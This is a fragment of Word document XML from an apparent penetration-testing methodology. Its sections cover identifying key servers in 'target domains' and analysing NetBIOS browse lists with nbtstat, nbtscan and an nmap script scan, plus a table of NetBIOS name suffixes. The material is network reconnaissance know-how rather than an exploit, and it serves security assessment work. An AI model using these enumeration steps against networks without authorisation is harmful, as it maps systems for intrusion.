    <w:p w:rsidR="00FA3D71" w:rsidRPr="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="00FA3D71">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E1b - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Identifying key se</w:t>
      </w:r>
      <w:r>
        <w:t>rvers within the target domains</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A0D29" w:rsidRDefault="008A0D29" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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/NTW </w:t>
      </w:r>
      <w:r w:rsidRPr="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/domain:&lt;name&gt;</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workstations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/NTS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/PDC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008A0D29" w:rsidRPr="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>primary</w:t>
      </w:r>
      <w:r w:rsidRPr="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (NT) domain controllers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/BDC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NT backup domain controllers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/PRINT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Print queue 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/RAS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008A0D29" w:rsidRPr="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Remote Access Serv</w:t>
      </w:r>
      <w:r w:rsidRPr="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>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/SQL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Microsoft SQL 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/TIM</w:t>
      </w:r>
      <w:r w:rsidRPr="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">E /domain:&lt;name&gt;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Time sources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/TS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Terminal Servers (full TS servers)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71"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/9x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sidRPr="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Windows 95/98/ME systems</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="00FA3D71">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E1c - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t xml:space="preserve">Identifying and </w:t>
      </w:r>
      <w:r>
        <w:t>analysing internal browse lists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B1539" w:rsidRDefault="004B1539" w:rsidP="004B1539"/>
    <w:p w:rsidR="004B1539" w:rsidRPr="00840548" w:rsidRDefault="004B1539" w:rsidP="00840548">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nbtstat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –A &lt;IP address&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>single host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B1539" w:rsidRPr="00840548" w:rsidRDefault="004B1539"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nbtscan</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –v –s: &lt;ipaddress range&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>full range</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B1539" w:rsidRPr="00840548" w:rsidRDefault="004B1539" w:rsidP="00840548">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –sC </w:t>
      </w:r>
      <w:r w:rsidRPr="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00840548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Script scan shows NBT browser list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B1539" w:rsidRPr="004B1539" w:rsidRDefault="004B1539" w:rsidP="004B1539"/>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b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>No.</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Type</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Usage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00 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Workstation Service </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01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&lt;\\--__MSBROWSE__&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">01 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">G </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>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03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06 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>RAS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1F </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>NetDDE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20 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>File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21 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>RAS Client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22 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">MA Exch </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Interchange(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MSMail Connector)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23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Store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24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Directory</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30 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Modem Sharing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31 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Modem Sharing Client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lastRenderedPageBreak/>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43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Control</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44 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>SMS Administrators Remote Control Tool</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45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Chat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46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Transfer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4C </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>DEC Pathworks TCPIP svc on Windows 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42 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>mccaffee anti-virus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52 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>DEC Pathworks TCPIP svc on Windows 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87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MTA</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6A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IMC</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BE </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Network Monitor Agent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BF </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Network Monitor Application</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&lt;username&gt;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03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&lt;domain&gt;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00 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">G </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Domain Name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1B </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Domain 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1C </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">G </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Domain Controllers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&lt;domain&gt;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1D </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>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1E </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">G </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Browser Service Elections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&lt;INet~Services&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">1C </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">G </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>IIS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&lt;IS~computer name&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">00 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>IIS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[2B] </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Lotus Notes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IRISMULTICAST </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">[2F] </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">G </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Lotus Notes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IRISNAMESERVER </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
